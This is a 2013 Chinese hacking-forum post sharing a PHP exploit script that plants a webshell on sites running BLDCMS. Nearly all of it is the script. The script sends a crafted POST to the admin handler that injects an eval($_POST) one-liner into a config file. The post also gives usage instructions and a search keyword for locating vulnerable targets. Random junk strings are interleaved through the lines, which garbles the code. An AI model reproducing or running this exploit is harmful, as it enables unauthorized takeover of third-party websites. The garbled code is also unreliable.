找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2171|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
, n5 L  v! r2 I& A3 B0 C% X
" [3 ^, Y/ q  q: L& e
! [; n# s9 x" h. i; ]) X$ Y9 [* Y话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 # Q3 n* @* e8 e4 X& G: X, z
6 O  k2 M3 u7 w% _3 G9 o
既然都有人发了 我就把我之前写好的EXP放出来吧
8 I. j- z5 l( m+ v+ a
' J( ~8 K7 l( w, K7 uview source print?01.php;">
5 x5 V" O4 U; b1 J  Q' x( X02.<!--?php
5 |; L, U5 [3 q5 S5 P03.echo "-------------------------------------------------------------------
6 q6 U/ m4 {. Q04. 5 ^$ Z- ~* ]) d6 s  _2 V- c" A+ @
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP- B5 H1 |1 P& W
06.
6 D" x3 L" H$ j07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
' h# h7 d: W0 X2 L! M! Q: E0 L6 E08.
2 A$ J! E; ^( [09.QQ:981009941\r\n                                2013.3.21\r\n            
9 \& ]6 ]- u5 `5 b' x3 m+ s1 U7 K10. $ m6 v! |: Q) z  ]
11. . D/ s& D. a0 O# ]% E+ M
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
: h+ o; y# |1 b2 ~& }13. 1 l: S9 L( a" W& c3 V7 `: N+ k/ R
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------& V1 x( V& F2 Y+ V
15. , ?; @& a: ~$ J; M4 {6 P
16.--------------------------------------------------------------------\r\n";
0 X  @" G% ]% f: W$ Y3 t! a17.$url=$argv[1];
% ?8 u( r' i+ a" \3 i, Q. w18.$dir=$argv[2];: \# G' H: L/ r; B; E- `4 h
19.$pass=$argv[3];
; f7 [, e. l; d4 @' {. n1 z) }20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
" }8 o, u2 g# z21.if (emptyempty($pass)||emptyempty($url))$ F8 q7 Q0 J$ e* I/ t
22.{exit("请输入参数");}* m$ A( g- u: F) X. z* i, n
23.else
7 b/ ?1 q1 c$ @& D9 i) }24.{
& C, s7 i9 z0 o: k6 q25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
- W* \* U! E# z2 h& c  c/ d26.
7 ?( L0 M7 r' x* y, @27.al;' p( X9 ~' L' o
28.$length = strlen($fuckdata);- k- N4 j4 U5 X/ p6 S$ f
29.function getshell($url,$pass)8 b0 q  e( h' a- ]7 W1 n, F6 @
30.{
5 L" U( E6 Z6 H7 }31.global $url,$dir,$pass,$eval,$length,$fuckdata;
& U, }% L; a9 v- o, l( `32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";+ a+ T+ n- G; Q" B
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
9 B, H' C, S4 V8 K34.$header .= "User-Agent: MSIE\r\n";
; d- h; A. D7 w- y) l0 x35.$header .= "Host:".$url."\r\n";
& C2 m( n& ~6 @& Z8 T. B8 ]36.$header .= "Content-Length: ".$length."\r\n";6 t3 ~, K. N1 o/ ]3 {; N- b
37.$header .= "Connection: Close\r\n";
1 C  u* N8 ]& _+ x38.$header .="\r\n";
. z3 u; x4 p1 @39.$header .= $fuckdata."\r\n\r\n";
7 E( _; n/ _- Q" H40.$fp = fsockopen($url, 80,$errno,$errstr,15);
% g+ y5 Y- R! l/ K( V* j41.if (!$fp)
' v- d" h+ B7 g% i7 n42.{
4 h2 E* U& A! k& l/ o) n43.exit ("利用失败:请检查指定目标是否能正常打开");5 |3 N  P( _+ x; [0 I  i* `& w
44.}
2 r1 H3 N+ I! D2 D$ N+ [45.else{ if (!fputs($fp,$header))
) U) ]3 w+ c- u- u46.{exit ("利用失败");}
6 E4 p4 K' m4 K7 G% h47.else
; n: J  w$ J1 r8 _48.{
2 w2 n* S% |2 P9 E/ f' V% p/ {# Y. X49.$receive = '';$ v3 `5 X9 s, |# z7 j, j
50.while (!feof($fp)) {8 R+ K* \* J4 _9 r
51.$receive .= @fgets($fp, 1000);, p" G6 s1 I1 _( F
52.}' Y, m$ `* A; h8 u+ B' q
53.@fclose($fp);
% \; _2 f5 W  N* C: i54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标( Z+ N7 Z- z8 O7 j4 j# g# ^4 d/ K
55.
, B, s7 p6 g; O. \  f& I56.GPC是否=off)";
: L+ Y) t  s2 k0 x2 z3 Q57.}}
5 f4 L! ?, s# J* n58.}2 W5 w; |9 f) o) N, m( T, E$ x
59.}
  i5 O8 M: H6 U  \3 [' t60.getshell($url,$pass);+ ?, {) {: w" w' Q9 q; i
61.?-->
# m; D% |3 [# K  n7 y ; O$ F( F/ J4 ?" w

1 J' [0 j8 Y" R' V) z0 D, P# W " J1 A7 s, }( u3 {7 \, `
by 数据流
3 R) @7 B- y* o, W+ k( ]* K) V" \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表